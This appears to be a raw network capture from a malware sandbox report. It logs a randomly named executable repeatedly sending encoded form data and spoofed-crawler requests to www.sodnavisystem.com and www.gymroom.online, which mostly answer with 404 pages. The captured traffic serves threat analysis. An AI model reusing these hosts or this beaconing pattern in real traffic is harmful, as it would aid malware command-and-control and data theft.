                                                          Last-Modified: Mon, 13 May 2024 05:45:59 GMT
                                                          ETag: W/"afe-6184f66651a97"
                                                          Content-Encoding: gzip
                                                          Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b [TRUNCATED]
                                                          Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9)
                                                          Jul 13, 2024 00:03:06.594926119 CEST353INData Raw: 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e
                                                          Data Ascii: ,KQ8xa%9s{Qo/|mu1.C-r[,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.649722162.43.105.95805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:03:08.328007936 CEST758OUTPOST /5mht/ HTTP/1.1
                                                          Host: www.sodnavisystem.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.sodnavisystem.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.sodnavisystem.com/5mht/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 55 32 55 72 39 58 4b 7a 55 36 43 57 48 52 52 41 61 66 54 66 57 66 44 7a 79 52 48 77 54 58 4f 49 36 36 48 65 36 36 6f 4d 76 65 32 55 75 77 6c 6f 6b 68 70 64 61 62 76 7a 4e 2f 4e 2b 66 74 47 72 5a 46 4a 46 53 4d 45 64 51 4d 46 41 35 36 55 48 6f 46 63 37 58 78 70 46 64 4c 78 46 6d 6d 43 34 36 57 66 78 37 57 73 45 62 33 5a 79 43 48 64 39 6a 6b 75 41 55 74 67 64 45 6d 43 71 47 56 41 44 2f 64 6b 37 6b 33 4d 69 4b 6e 51 61 58 77 36 74 34 6a 50 4a 74 70 41 47 49 41 68 74 39 6e 44 76 74 52 7a 4f 30 65 71 38 54 45 76 45 31 35 6e 70 69 4d 2b 76 52 61 43 33 75 52 43 46 58 6a 35 43 38 66 32 47 7a 56 72 57 53 75 6f 63 43 30 75 73 43 71 52 48 38 44 55 72 58 61 76 6f 47 34 77 48 4d 51 3d 3d
                                                          Data Ascii: D0Pts04=U2Ur9XKzU6CWHRRAafTfWfDzyRHwTXOI66He66oMve2UuwlokhpdabvzN/N+ftGrZFJFSMEdQMFA56UHoFc7XxpFdLxFmmC46Wfx7WsEb3ZyCHd9jkuAUtgdEmCqGVAD/dk7k3MiKnQaXw6t4jPJtpAGIAht9nDvtRzO0eq8TEvE15npiM+vRaC3uRCFXj5C8f2GzVrWSuocC0usCqRH8DUrXavoG4wHMQ==
                                                          Jul 13, 2024 00:03:09.169740915 CEST1236INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Fri, 12 Jul 2024 22:03:09 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Last-Modified: Mon, 13 May 2024 05:45:59 GMT
                                                          ETag: W/"afe-6184f66651a97"
                                                          Content-Encoding: gzip
                                                          Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b [TRUNCATED]
                                                          Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9)
                                                          Jul 13, 2024 00:03:09.169766903 CEST353INData Raw: 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e
                                                          Data Ascii: ,KQ8xa%9s{Qo/|mu1.C-r[,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.649723162.43.105.95805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:03:10.859141111 CEST1771OUTPOST /5mht/ HTTP/1.1
                                                          Host: www.sodnavisystem.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.sodnavisystem.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.sodnavisystem.com/5mht/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 55 32 55 72 39 58 4b 7a 55 36 43 57 48 52 52 41 61 66 54 66 57 66 44 7a 79 52 48 77 54 58 4f 49 36 36 48 65 36 36 6f 4d 76 65 2b 55 75 44 39 6f 31 77 70 64 62 62 76 7a 45 66 4e 37 66 74 47 4d 5a 46 52 2f 53 4d 49 6e 51 4a 5a 41 35 66 49 48 76 33 6b 37 64 78 70 46 66 4c 78 59 70 47 43 70 36 57 4f 34 37 57 38 45 62 33 5a 79 43 42 78 39 77 56 75 41 57 74 67 53 54 57 43 63 51 56 41 37 2f 64 38 4e 6b 33 49 59 4b 58 77 61 57 51 71 74 30 78 6e 4a 67 70 41 45 4e 41 67 2b 39 69 61 78 74 52 76 34 30 64 32 61 54 44 6e 45 31 49 58 32 30 4e 69 6c 4c 63 65 62 2b 44 71 31 59 54 70 6c 37 65 32 4c 67 47 66 55 54 39 77 38 4b 6a 50 77 4d 61 51 2f 73 52 73 4a 64 76 66 33 50 6f 77 4f 50 4e 4e 42 66 53 6b 68 53 59 32 50 5a 44 7a 64 74 53 2b 37 64 4b 66 70 6e 47 6f 39 6e 32 58 78 31 4d 4c 39 62 45 48 4a 77 46 71 2b 43 51 6b 2b 4f 6b 61 77 35 43 74 48 30 66 31 72 48 61 37 75 64 33 4b 30 77 2f 61 55 74 33 39 76 50 44 77 59 65 42 6e 66 5a 34 47 76 42 48 71 73 33 67 72 41 61 49 71 44 52 56 57 2b 6c 2b [TRUNCATED]
                                                          Data Ascii: D0Pts04=U2Ur9XKzU6CWHRRAafTfWfDzyRHwTXOI66He66oMve+UuD9o1wpdbbvzEfN7ftGMZFR/SMInQJZA5fIHv3k7dxpFfLxYpGCp6WO47W8Eb3ZyCBx9wVuAWtgSTWCcQVA7/d8Nk3IYKXwaWQqt0xnJgpAENAg+9iaxtRv40d2aTDnE1IX20NilLceb+Dq1YTpl7e2LgGfUT9w8KjPwMaQ/sRsJdvf3PowOPNNBfSkhSY2PZDzdtS+7dKfpnGo9n2Xx1ML9bEHJwFq+CQk+Okaw5CtH0f1rHa7ud3K0w/aUt39vPDwYeBnfZ4GvBHqs3grAaIqDRVW+l+yT+mu9JaeAZJ5TXmoErrnCAc3oxPAP6HXaXWlT3JAWsF/R2KNUGOsR4g0hpZVJx/OWXDSCGWRKGfwtVwmwOTXi41mIM+8NtqpjVOsPVBlcI1sIknWasx+84gg9r+wLG+YZCg2YJCStGys9SvYz3ihEbeWVgD1gPujE7yXNzERg6zCXbAdCz/V+7Us26Eod0AUto6KC8Q0c8nAWGdxLXWh51qNTO9hvDC24FjkG/1c+KB5urcv/hiG1LW8WiiDqWHdIdCH47LEEDA+VKdvpNVk5FSt6LqI2jRkQBabG85Qz1b8LGiA3mK12i8z5ROCjY1/A0ZC9w0SlL3JIa83Bfz3vmNT4hTVxjkHgvIJTE+85FqBCyYX0W+QNovR+0X/J8k6Dvk9Oo2/DISCEtZzZLl1xFzDeNcHzkx8xBLqAb5jpJgBYAjkmQ+65fsibGcX0ll3Ws3wzt/YjrbMkMfrlU1P6ANJCWIYWHtEFLTgo7gJ+gOXoT6VMeIvGq3FZ7PKQ6h2b9Cfft+XZLzP+5ouwL0epDcLgMCy8GCuRo5KF8rtrxHZxmjbII79LHUFDMA3cuAVX5CgG8vMrH9ax7K0OrZScri2yZh6Js1m5KCORsuHBkZ0308b9mBG/SEM3fgfbuNFaNy7h4ooN82KXcGhxlMXaYa5/Mr0pJyjG [TRUNCATED]
                                                          Jul 13, 2024 00:03:11.663120031 CEST1236INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Fri, 12 Jul 2024 22:03:11 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Last-Modified: Mon, 13 May 2024 05:45:59 GMT
                                                          ETag: W/"afe-6184f66651a97"
                                                          Content-Encoding: gzip
                                                          Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b [TRUNCATED]
                                                          Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9)
                                                          Jul 13, 2024 00:03:11.663170099 CEST353INData Raw: 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e
                                                          Data Ascii: ,KQ8xa%9s{Qo/|mu1.C-r[,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.649724162.43.105.95805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:03:13.390597105 CEST471OUTGET /5mht/?D0Pts04=Z08L+geXOaCZa14sbeCJfO+ty3TNCWizhbeG/u0IqvbIpSo6wwwncoz4Fc07Z+7/YVsNS4spfMpi37Q9hxoWZDkaSJlwmX6Cm2C8jVF4FHpqAh5dp062dcYDJG78WF4slIEKgCc=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.sodnavisystem.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:03:14.196311951 CEST1236INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Fri, 12 Jul 2024 22:03:14 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2814
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Last-Modified: Mon, 13 May 2024 05:45:59 GMT
                                                          ETag: "afe-6184f66651a97"
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14px;
                                                          Jul 13, 2024 00:03:14.196331978 CEST1236INData Raw: 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 2e 65 78 70 6c 61 69 6e 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73
                                                          Data Ascii: margin: 0; padding: 0; color: white;}.explain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li {
                                                          Jul 13, 2024 00:03:14.196342945 CEST582INData Raw: 64 69 76 20 69 64 3d 22 62 61 73 65 22 3e 0a 20 20 20 20 3c 68 31 3e 3c 73 70 61 6e 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 68 32 3e
                                                          Data Ascii: div id="base"> <h1><span>404</span><br /> File Not Found</h1> <h2></h2> <p class="explain"></p> <h3>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.64972537.9.175.173805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:03:19.293894053 CEST725OUTPOST /9v4b/ HTTP/1.1
                                                          Host: www.gymroom.online
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.gymroom.online
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.gymroom.online/9v4b/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 64 79 74 62 4b 53 51 64 61 68 4c 33 49 66 61 31 31 42 56 47 4b 31 2b 57 68 4b 4f 56 30 4b 6f 35 4d 6a 53 6e 53 78 48 36 6a 6c 37 50 52 6c 51 48 2b 42 78 6c 72 56 4c 37 37 6d 7a 32 30 6b 58 50 4c 58 2f 76 62 52 6b 4c 69 70 45 77 6f 55 44 68 2f 79 68 6d 68 69 54 4e 45 6b 49 68 5a 74 63 42 47 4e 2f 6a 65 36 41 6c 35 55 6c 5a 33 44 48 39 65 43 41 39 77 57 78 34 67 68 61 52 39 6e 75 61 6c 68 4a 53 61 45 54 50 52 75 62 62 41 2b 4e 49 52 70 31 53 6c 41 77 46 51 66 68 7a 79 6f 54 73 68 77 39 50 31 36 68 6b 57 72 43 37 4c 79 6f 49 70 44 6d 35 7a 45 66 30 67 6c 50 54 35 45 6f 34 5a 57 51 45 42 56 2b 48 74 71 38 79
                                                          Data Ascii: D0Pts04=dytbKSQdahL3Ifa11BVGK1+WhKOV0Ko5MjSnSxH6jl7PRlQH+BxlrVL77mz20kXPLX/vbRkLipEwoUDh/yhmhiTNEkIhZtcBGN/je6Al5UlZ3DH9eCA9wWx4ghaR9nualhJSaETPRubbA+NIRp1SlAwFQfhzyoTshw9P16hkWrC7LyoIpDm5zEf0glPT5Eo4ZWQEBV+Htq8y
                                                          Jul 13, 2024 00:03:20.056786060 CEST298INHTTP/1.1 404 Not Found
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:03:19 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: br
                                                          Data Raw: 35 38 0d 0a a1 a8 04 00 20 76 b6 6e 13 ba d0 b0 c9 17 a2 d2 6c 9a cd 2b af 27 0b b9 7f 97 8c 64 aa 54 d1 9a d0 e8 0d 8f cf c7 90 92 8b 85 2c 09 e3 ac ba 68 9f b0 90 9c 93 8f e4 1b 51 98 0c 93 60 a2 85 80 b0 32 8a 2d 95 0d 55 ed 68 37 f8 cf 05 00 f1 cf d6 bb 6f e3 ea d5 34 23 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 58 vnl+'dT,hQ`2-Uh7o4#0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.64972637.9.175.173805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:03:21.932615995 CEST749OUTPOST /9v4b/ HTTP/1.1
                                                          Host: www.gymroom.online
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.gymroom.online
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.gymroom.online/9v4b/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 64 79 74 62 4b 53 51 64 61 68 4c 33 4a 37 65 31 35 43 4e 47 4e 56 2b 56 39 61 4f 56 74 61 6f 44 4d 6a 57 6e 53 31 57 69 6a 58 76 50 52 41 55 48 2f 41 78 6c 6f 56 4c 37 38 57 7a 33 36 45 58 79 4c 58 36 59 62 52 59 4c 69 70 51 77 6f 56 7a 68 2f 42 5a 6c 67 79 54 50 52 55 49 6e 57 4e 63 42 47 4e 2f 6a 65 2b 68 34 35 55 39 5a 33 54 58 39 5a 54 41 79 32 6d 78 37 70 42 61 52 35 6e 75 65 6c 68 4a 77 61 47 32 61 52 73 6a 62 41 2f 39 49 52 34 31 56 73 41 78 41 4e 50 67 61 36 49 32 38 75 7a 41 37 37 6f 4a 33 58 4a 4f 48 4f 45 70 53 31 77 6d 61 68 55 2f 32 67 6e 58 68 35 6b 6f 53 62 57 6f 45 54 43 79 67 69 65 5a 52 6a 43 69 58 4c 4c 4f 75 73 32 6e 53 41 5a 4b 5a 4b 6d 74 4c 2f 51 3d 3d
                                                          Data Ascii: D0Pts04=dytbKSQdahL3J7e15CNGNV+V9aOVtaoDMjWnS1WijXvPRAUH/AxloVL78Wz36EXyLX6YbRYLipQwoVzh/BZlgyTPRUInWNcBGN/je+h45U9Z3TX9ZTAy2mx7pBaR5nuelhJwaG2aRsjbA/9IR41VsAxANPga6I28uzA77oJ3XJOHOEpS1wmahU/2gnXh5koSbWoETCygieZRjCiXLLOus2nSAZKZKmtL/Q==
                                                          Jul 13, 2024 00:03:22.665031910 CEST298INHTTP/1.1 404 Not Found
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:03:22 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: br
                                                          Data Raw: 35 38 0d 0a a1 a8 04 00 20 76 b6 6e 13 ba d0 b0 c9 17 a2 d2 6c 9a cd 2b af 27 0b b9 7f 97 8c 64 aa 54 d1 9a d0 e8 0d 8f cf c7 90 92 8b 85 2c 09 e3 ac ba 68 9f b0 90 9c 93 8f e4 1b 51 98 0c 93 60 a2 85 80 b0 32 8a 2d 95 0d 55 ed 68 37 f8 cf 05 00 f1 cf d6 bb 6f e3 ea d5 34 23 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 58 vnl+'dT,hQ`2-Uh7o4#0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.64972737.9.175.173805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:03:24.473283052 CEST1762OUTPOST /9v4b/ HTTP/1.1
                                                          Host: www.gymroom.online
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
